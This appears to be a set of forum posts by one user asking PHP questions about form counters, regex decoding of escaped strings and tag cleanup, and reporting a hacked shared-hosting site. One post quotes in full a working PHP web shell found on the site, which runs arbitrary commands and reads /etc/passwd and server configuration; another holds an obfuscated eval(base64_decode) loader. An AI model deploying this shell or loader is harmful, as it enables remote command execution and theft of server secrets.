newbtophp

@teynon I have the file correctly placed and chmodded 777, still no counts are logged to testFile.txt

teynon i tried your code and its not working: <form method="post" enctype="multipart/form-data" action="<?=$_SERVER["PHP_SELF"]?>"> <input name="file" type="file" /> <input type="submit" name="submit" value="submit" /> </form> <?php if (isset($_FILES['file'])) { $file = file_get_contents($_FILES['file']['tmp_name']); $submit = $_POST['submit']; if($file == "") echo "Error!"; else { $myFile="count.txt"; $count=file_get_contents($myFile); if ($fh=fopen($myFile, 'w')) { if (fwrite($fh, $count++)) { echo $count; } fclose($fh); } } } ?> Everytime i click submit its meant to increase the count number by 1, buts currentlys its not doing anything :-\

How would i log submits on a form, by everyone? I want to then echo the number of submissions. I've tried this: <?php if (isset($_POST['submit'])) { $myFile = "testFile.txt"; $fh = fopen($myFile, 'w') or die("can't open file"); fwrite($fh, $submit); fclose($fh); } ?> But unsure of what to do next... :-\

I do have an upload form, but that dont store any files, it just use php tmp (temporary) directory and unlink() function. In my .htaccess theirs the following code: Options +Includes AddType text/html .shtml AddHandler server-parsed .shtml I dont remember puting that in their, my .htaccess was empty, so this had to the cause of that.

won't get you help, since i'm quite sure you don't want to exploit your own site .. think, "how can i offer more insight into MY issue at hand", rather than making quips. patching it is one thing, but actually resolving the reason this was injected in the first place is what is really important. Sorry, im just panicking. I've reset my cp pass, and also cleared my site and reinstalled a fresh backup. I found the code within a file named liz0.php (i've never seen this file before, and never uploaded it) within a subdirectory which also contains an error_log and a file named c99.txt. (i tried posting that file here, but my antivirus wont allow it) After some research (see my above post), I've realised the hacker/s got access to my site by a php safemode bypass vulnerability. Im on shared hosting and this is the properties: Apache version 1.3.41 (Unix) PHP version 5.2.9 Operating system Linux

It looks like: http://securityvulns.com/news/PHP/htacces/safemodebypas.html http://jolmos.blogspot.com/2008/02/php-safemode-bypass-cve-2007-3378.html EDIT: After googling i found, a site suggesting a solution: "Disable the error_log function via the disable_functions directive if the safe mode protection is required. This may impact functionality. All software vendors (including open source developers) should audit their source. via Secunia" http://blog.taragana.com/index.php/archive/php-safe-mode-bypass-weakness-uncovered-in-error_log/ But not sure? :-\

No I wouldnt upload a shell to my site, why would i want to exploit my site?

I got hacked and the following code was placed within my files: <? /* Kodlama By Liz0ziM Safe Mode Command Execution Shell */ function safeshell($komut) { ini_restore("safe_mode"); ini_restore("open_basedir"); $res = ''; if (!empty($komut)) { if(function_exists('exec')) { @exec($komut,$res); $res = join("\n",$res); } elseif(function_exists('shell_exec')) { $res = @shell_exec($komut); } elseif(function_exists('system')) { @ob_start(); @system($komut); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')) { @ob_start(); @passthru($komut); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($komut,"r"))) { $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); } } return $res; } echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execution Bypass Exploit</font></b><br>"; print_r(' <pre> <form method="POST" action=""> <b><font color=blue>Komut :</font></b><input name="baba" type="text"><input value="?al??t?r" type="submit"> </form> <form method="POST" action=""> <b><font color=blue>H?zl? Men? :=) :</font><select size="1" name="liz0"> <option value="cat /etc/passwd">/etc/passwd</option> <option value="netstat -an | grep -i listen">T?m A??k Portalar? G?r</option> <option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option> <option value="cat /etc/syslog.conf">/etc/syslog.conf</option> <option value="cat /etc/hosts">/etc/hosts</option> <option value="cat /etc/named.conf">/etc/named.conf</option> <option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option> </select> <input type="submit" value="G?ster Bakim"> </form> </pre> '); ini_restore("safe_mode"); ini_restore("open_basedir"); if($_POST[baba]!= "") { $liz0=safeshell($_POST[baba]); } if($_POST[liz0]!= "") { $liz0zim=safeshell($_POST[liz0]); } $uid=safeshell('id'); $server=safeshell('uname -a'); echo "<pre><h4>"; echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid<br>"; echo "<b><font color=red>Server</font></b>:$server<br>"; echo "<b><font color=red>Komut Sonu?lar?:</font></b><br>"; if($_POST["baba"]!= "") { echo $liz0; } if($_POST["liz0"]!= "") { echo $liz0zim; } echo "</h4></pre>"; ?> How would i patch this?, like is their any code i can add to a global file to prevent this "safemode bypass"?

salathe thank you very much! for that reply & tutorial! :D :D Solved

Too summarise: Im trying to create a way to replace all encoded code with readable/decoded code. I know how to decode its very simple just echo the encoded: <?php echo "\166\x65\156\x6f\x6f\165\1631\x5f\x6d\141\x77\x61\x6c\171"; ?> Which will decode to readable code: venoous1_mawaly I can do it manually be echoing each encoded string and then replacing it with the echo output, but this can get tiring, would be nice to create a way to do this so it echos the whole file replaced with the include readable output. Heres a sample encoded file. <?php $x0b = "\166\x65\156\x6f\x6f\165\1631\x5f\x6d\141\x77\x61\x6c\171"; $x0c = "ve\156\x6f\x6f\x75\163\061_m\x61waly"; $x0d = "\x33%\x28\124\124?\x3a\x7dA\102A4"; $x0e = "\x6c\157ca\x6c\x68os\x74"; $x10 = "\x35\x2d10-\x32\x301\x30"; $x11 = mysql_connect($x0e, $x0c, $x0d); ?> If i manually echo'd each string and replaced it, the whole code would be readable and look like: <?php $x0b = "venoous1_mawaly"; $x0c = "venoous1_mawaly"; $x0d = "3%(TT?:}ABA4"; $x0e = "localhost"; $x10 = "5-10-2010"; $x11 = mysql_connect($x0e, $x0c, $x0d); ?> Im not entirelly sure on how to do this, so i thought if i can get some help with regex i can use preg_match_all() and then echo it or something. Looking at the pattern of the encoded strings, they look similar to urlencoded() strings except dont have % instead have an x, but this is not always true. Any help is apreciated.

<?php if (function_exists('mail')) { echo "Looks like php mail() is installed/enabled so its something else.."; } else { echo "The problem is php mail() is not installed or enabled"; } ?>

Yeah, sorry about that.. got stuff on my mind.. so I'm not all there today. Perhaps this is a sign I should stop offering suggestions for the day It's ok mate, take a break mate, I apreciate the help. Put your feet up and watch tv

Sure, had a quick look: <?php $text = '<? \166\x65\156\x6f\x6f\165\1631\x5f\x6d\141\x77\x61\x6c\171 ?>'; if(preg_match('#\\\[x0-9][0-9]{2,3}#', $text, $matches)) { print_r($matches); } ?> Im sure im doing it correctly but it dont print the whole match :-\

Thanks for the links, ill try and experiment, although regex seems hard & complex. But ill challenge myself. I created a function using your expression: <?php $text = "<?php //Begin xurlencoded code '\166\x65\156\x6f\x6f\165\1631\x5f\x6d\141\x77\x61\x6c\171'; ?>"; function xurldecode($input){ //find xurlencoded data $input = preg_match('#\\\[x0-9][0-9]{2,3}#', $output); //little trick to decode the found data $output = urldecode(str_replace('\x','%',$input)); return $output; } echo(xurldecode($text)); ?> But doesnt seem to work, can you perhaps point me in the right direction? :-\

Example: \166\x65\156\x6f\x6f\165\1631\x5f\x6d\141\x77\x61\x6c\171 Always 3-4 characters followed by a dash, the first character is always a number or an x. All help is very apreciated

Thanks worked nicely

How would i replace: (); if its on its own line, without effecting other code, i tried str_replace but that would replace other code even if its not on its own line, for example: <?php include_once("application.php"); (); $account = new Account(); (); $accounts_4_sale = new ProductListing(); $limit = RECORD_PER_PAGE; $start = isset($_GET['pagenum']) ? ($_GET['pagenum'] - 1) * $limit : 0; (); $content = new Content(); include_once(THEME_PAGES_DIR."page_structure.html"); ?> Would turninto: <?php include_once("application.php"); $account = new Account(); $accounts_4_sale = new ProductListing(); $limit = RECORD_PER_PAGE; $start = isset($_GET['pagenum']) ? ($_GET['pagenum'] - 1) * $limit : 0; $content = new Content(); include_once(THEME_PAGES_DIR."page_structure.html"); ?> All help greatly apreciated

Solved, thanks

Cags that works on some, but not most. For example: <?php $OOO0O0O00=__FILE__;$O00O00O00=__LINE__;$OO00O0000 =5552;eval((base64_decode('JE8wMDBPME8wMD1mb3Blbig kT09PME8wTzAwLCdyYicpO3doaWxlKC0tJE8wME8wME8wMClmZ 2V0cygkTzAwME8wTzAwLDEwMjQpO2ZnZXRzKCRPMDAwTzBPMDA sNDA5Nik7JE9PMDBPMDBPMD0oYmFzZTY0X2RlY29kZShzdHJ0c ihmcmVhZCgkTzAwME8wTzAwLDM3MiksJ0FsRlBnMk9JdFY2Ukh CK1o3MzhvdWhzaldhejVrUUROWTQ5L1MxZE1uclV2SnlmaWVFY kwwd0ttcUN4VEdwWGM9JywnQUJDREVGR0hJSktMTU5PUFFSU1R VVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejAxMjM0N TY3ODkrLycpKSk7ZXZhbCgkT08wME8wME8wKTs=')));return ;?> VgpZHPlZHPlZHPw1kdhMjmV1kOE4WKunVwpN3S1H3hpNVbe9Vb tfVgpZoLlZHgGeHFq9VbtJ6OV4kKuKB2pSasBiaOunkm3bQItn aMV1Ws7nVgGeHPlZHgGeHFeSo0GeHgGeHPAe68eM7sEOuOkbo0 10h/a88gtvs/kL+OpwzIBUhK2xBsy33gCaBPSiuL2SosCbhja6Dsarauh9oPlm 8KwE7m4u3mlWWL0MRFQl7SBg3uaI8g1680EBoSp7uhVoh2hshw 4asd29WK31adQnzsrv5Owf5mlEkMB0QjamDI1xHPgbHL7wB/kq+8JiVbSr68STadBJ5mB16F3ZHPAeoLlZHm3b6F315dBNQOhqQFeYHFeYVO1KjKE159 SJtPAJtPuEH9STP7rmzO1Ja8AnVOSYZFAS59SYDe06VOVJ5KBv tP0Ykmh9km3b6F315dBNQOhqQFeYVOSJtPgK6oJBF93e5O2r51 p0aj40tFqptF395Op/zblDtIl4WKJnV0YUVbeY5s7w6F3rQ9Sr+e06VO1KtP0Ykmh9km 3b6F395Op/zbAftF3rQ9eYHFeYBogb68lDtF3eWjBLQKpbaPJBF93rtFJptP gK+e06N706kdh0QjVftIlbasQNkdhe5O2/a8YMRwEkDPgLj2EqHPAUVFGMRFAMVbeYVIlJWs1fjm31DI7r+e 06N706

Cags, your pattern does not seem to work: I tried it with this file: <?php $OOO0O0O00=__FILE__;$O00O00O00=__LINE__;$OO00O0000=76;eval((base64_decode('JE8wMDBPME8wMD1mb3BlbigkT09PME8wTzAwLCdyYicpO3doaWxlKC0tJE8wME8wME8wMClmZ2V0cygkTzAwME8wTzAwLDEwMjQpO2ZnZXRzKCRPMDAwTzBPMDAsNDA5Nik7JE9PMDBPMDBPMD0oYmFzZTY0X2RlY29kZShzdHJ0cihmcmVhZCgkTzAwME8wTzAwLDM3MiksJ1Q4OUV6ZUxpL0RrWHdTN0NmSGorSW9tUEF0M3k2VkJXcHFoc2JncjRsTUY1eDJKdU9SVVlLR25aME5hUWR2YzE9JywnQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejAxMjM0NTY3ODkrLycpKSk7ZXZhbCgkT08wME8wME8wKTs=')));return;?> DzvCwE8CwE8CwEGg6ro4PZDg6LRqAnIlDGvWHbgwHovWDUOhDU/JDzvC+Y8CwzdOw90hDU/xkLDq6nInSevbtmSutLIl6ZHUVi/lt4DgAmflDzdOwE8CwzdOw9Ob+KdOwzdOwETOkjO4oEpNHPMg+LbuHL2AVGwZfnt/3h2DynGffPfYB+tmfgVO6mqYArVUSLRSHso0wbMG+GDomI2iyglO+reHtitsw+K4X9V8fbSzHItijzgkjKRS+bvfIoD+oeomoGqtmrehAnHgtrVl3mM5yLGJyZ8R64SKVPtZBigawEzUwYfGSs607jxuDUbMkjbQtrSxyZSgk9HCwETO+Y8CwETM7nonAmOlDzvCwE8CwE8Cw9bQEfMltmebtP/l/rRuAneK3mvJ7h8lViHO7hduVZVZXrtu6rvZAPDgBhNg6U/M7OKktPqMVExS9p==

Take alook at: http://wordpress.org/extend/plugins/tac/ Im working on a better version, I need the preg_matchs to detect encoded code.

Ok sure I decided to stick to your function and not use that regex as it would effect the previous regex from the function. Thanks for all the help Mind taking alook at?: http://www.phpfreaks.com/forums/index.php/topic,272414.0.html Cheers

Cags thats an awesome function, thanks alot. What would be the match for the following?, as you can see it ends with a php start tag, and I'd like to replace it with the actual end tag '?>' <?php function managerestaurants() { //check admin login $this->admin_model->checkAdminAccess(); $this->data['restaurantsData'] = $this->admin_model->getRestaurants(); $this->load->view('admin_manage_restaurants', $this->data); } }<?

Thanks added both works better, this is the output: ?><br class="clear" /> </div> <div id="footer-wrap"> <div id="footer"> <div class="span-3 append-1 small"> <?php if ( !function_exists(dynamic_sidebar) || !dynamic_sidebar(Bottom-Left) ) : ?> <?php endif; ?> </div> The tag still remains: ?><br class="clear" />

$out = preg_replace('~\?>\s*?<\?php~s', "", $input); Works fine on the example you gave... it simply looks for a closing tag followed by an open tag, with nothing but whitespace between them. Say if this is my file: ?><br class="clear" /> </div> <div id="footer-wrap"> <div id="footer"> <div class="span-3 append-1 small"> <?php if ( !function_exists(dynamic_sidebar) || !dynamic_sidebar(Bottom-Left) ) : ?> <?php endif; ?> </div><? The preg_replace makes no effect, the tags still display beside the divs (when their is no need)